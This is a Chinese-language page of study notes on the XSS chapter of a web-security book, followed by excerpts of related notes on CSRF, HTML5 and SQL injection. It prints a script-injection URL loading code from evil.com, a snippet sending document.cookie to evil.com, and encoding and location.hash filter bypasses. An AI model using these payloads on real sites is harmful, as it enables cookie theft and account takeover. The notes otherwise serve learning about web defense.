《白帽子讲web安全》第三章XSS读书笔记

3.1 xss简介

cross site script 本来缩写是css,为了跟网站开发中的css区分,安全领域称为xss。

xss的产生原因是直接把用户的输入,输出到页面上,黑客可以输入脚本语句进行攻击。

xss的分类:反射性xss,需要诱使用户点击恶意链接才能攻击成功;存储型xss,也叫持久型xss,黑客输入的数据可以存储在服务器上;DOM based xss,实际上是一种反射性xss,通过修改页面的DOM来进行攻击。

3.2 xss攻击进阶

3.2.1 初探xss payload

xss payload实际上就是java script,还可以说flash或其他富客户端脚本。

真正的payload写在远程脚本中,避免直接在url中写入大量代码,如:

http://www.a.com/test.htm?abc="><script src=http://www.evil.com/evil.js></script>

窃取cookie的代码:

var img =  document.createElement("img");

img.src = "http://www.evil.com/log?"+escape(document.cookie);

document.body.appendChild(img);

cookie的HttpOnly可以防止Cookie劫持。

3.2.2 强大的xss payload

  • 构造get与post请求

get请求的例子:假设sohu博客上存在xss漏洞并且知道文章id,那么删除sohu博客该文章,只需调整:

img.src = "http://blog.sohu.com/manage/entry.do?m=delete&id=1234567

post请求的例子:利用xss在豆瓣上发言,可以通过构造form或XMLHttpRequest两种方式发起post请求,代码较长,详见书的p48-49。书中还有一个更复杂的读取qq邮箱的例子。

  • xss钓鱼

xss缺少与用户交互,对于这个问题,书中举了两个例子,一个针对验证码,另一个上通过构造密码输入框,钓鱼方式获取用户密码。

  • 识别用户浏览器
  • 识别用户安装的软件
  • 获取用户的真实ip地址

以上几个有需要的时候再研究了。

3.2.3 xss攻击平台

Attack API、BeEF、xss proxy

3.2.4 终极武器 xss worm

举了myspace和百度空间的两个例子,难度挺大。

3.2.5 调试js

firebug:第一利器,缺点是只对firefox支持最好。

IE developer tools、Fiddler、HttpWatch等。

3.2.6 xss构造技巧

时间: 2024-10-29 19:09:46

《白帽子讲web安全》第三章XSS读书笔记的相关文章

白帽子讲Web安全 第三章 跨站脚本攻击(XSS)

XSS----Cross Site Script; XSS攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击. 1.XSS根据效果划分三类: 1)反射型XSS(非持久型XSS):简单的把用户输入的数据"反射"给浏览器.黑客往往需要诱导用户点击一个恶意链接,才能攻击成功. 2)存储型XSS(持久型XSS):存储型会把用户输入的数据存储在服务器端.这种具有很强的稳定性. 3)DOM Based XSS:通过修

白帽子讲WEB安全 第七章 注入攻击

一.SQL注入: 1.注入攻击的本质:把用户输入的数据当代码执行. 攻击的关键点:1.用户能够控制输入: 2.原本程序要执行的代码, 2.盲注(Blind Injection):在服务器没有错误回显时完成的注入攻击. 3.时序攻击(Timing Attack):利用BENCHMARK()函数(mysql中用于测试函数性能的函数),可以让同一个函数执行若干次,使得结果返回的时间比平时要长:通过时间长短的变化,可以判断出注入语句是否执行成功.这是一种边信道攻击. 边信道攻击(side channel

白帽子讲WEB安全 第六章 HTML 5安全

1.新标签的XSS H5中定义类很多新标签.新事件可能带来XSS(为研究XSS攻击H5的变化成立项目----HTML 5 Security Cheatsheet) eg: 1)  <video src=" "  onloadedmetadate="alter(XSS)">----远程加载视频 2)  <audio>----远程加载音频 3) iframe 的新属性---sandbox:这一属性使iframe加载的内容变成一个独立的源,其中脚本

白帽子讲Web安全 第四章 跨站点请求伪造(CSRF)

1.CSRF : Cross Site Request Forgery. 该攻击通过在授权用户访问的页面中包含链接或脚本的方式工作.是一种依赖Web浏览器的.被混淆过的代理人攻击. 2.常见特性: 依靠用户标识危害网站 利用网站对用户标识的信任 欺骗用户的浏览器发送HTTP请求给目标站点 另外可以通过含有src性质的标签(eg: iframe\image\script\style)会触发一个GET请求,可以利用这个发起CSRF攻击. 详见:http://www.cnblogs.com/hyddd

白帽子讲Web安全1.pdf

第一章 我的安全世界观 安全是一个持续过程 6种威胁:Spoofing(伪装).Tampering(篡改).Repudiation(抵赖).InformationDisclosure(信息泄漏).Denial of Service(拒绝服务).Elevation of Privilege(提升权限) 一个优秀的安全方案需要: 有效解决问题 用户体验良好 高性能 低耦合 易于升级和扩展 安全策略 Secure by Default原则(最小权限原则):白名单可通过和禁止黑名单,前者限制的范围更大更

白帽子讲Web安全2.pdf

XSS构造技巧 利用字符编码: var redirectUrl="\";alert(/XSS/);"; 本身没有XSS漏洞,但由于返回页面是GBK/GB2312编码的“%c1\”成为了一个Unicode字符,忽略掉转义字符\ %c1";alert(/XSS/);// 绕过长度限制: 很多时候产生XSS的地方会有变量长度限制,将代码藏在location.hash中,然后在其他地方调用即可 http://www.a.com/test.html#alert(1) <

读&gt;&gt;&gt;&gt;白帽子讲Web安全&lt;&lt;&lt;&lt;摘要→我推荐的一本书

<白帽子讲Web安全>吴翰清著 刚开始看这本书就被这本书吸引,感觉挺不错,给大家推荐下,最近读这本书,感觉不错的精华就记录下, 俗话说>>>好脑袋不如一个烂笔头<<< 还有,大家也看出来,最近我也要开始写博客了, 万事开头难嘛,先拿来那些nx点的人物的书籍来记录下, 本人文笔确实不怎么滴,思路略混乱,中学时代我的作文就是我们班的一盏亮灯,指引我们全班文笔不要向我的文笔思路靠近 ←```warn```→ 读万卷书,行万里路,以后不做宅男.加油··· 信息不等于

《白帽子讲Web安全》——第一篇 第一章 我的安全世界观

前些日子定的书单,下放给各淘宝卖家,今天来的第一本就是这本,是一个我完全陌生的领域,然而强烈的好奇心,催使我看完了第一章,其实就是个概述. 1.1 Web安全简史 exploit:黑客们使用的漏洞利用代码. Script Kids:只对攻击本身感兴趣,没有动手能力,对计算机原理和各种编程技术略知一二,因而只能编译别人的代码的黑客,即“脚本小子”. 1. Web安全的兴起 (1)SQL注入 (2)XSS (3)CSRF http://blog.csdn.net/dyllove98/article/

《白帽子讲WEB安全》学习笔记之第1章 我的安全世界观

第1章 我的安全世界观 1.1 web安全简史 1.1.1 中国黑客简史 现在中国乃至全世界的黑客或者说是骇客已经进入了"黑暗时代",因为互联网存在这大量的利益. 1.1.2 黑客技术的发展历程 1.1.3 web安全的兴起 web安全是信息安全领域的一个重要的分支,但是中国目前对web安全的重视程度远远不足. 为什么要攻击Web应用,我认为主要有以下几个原因: q  web应用无处不在. q  相比较与操作系统等的安全防御能力,攻破web更容易一些. q  攻击web可以来无影去无踪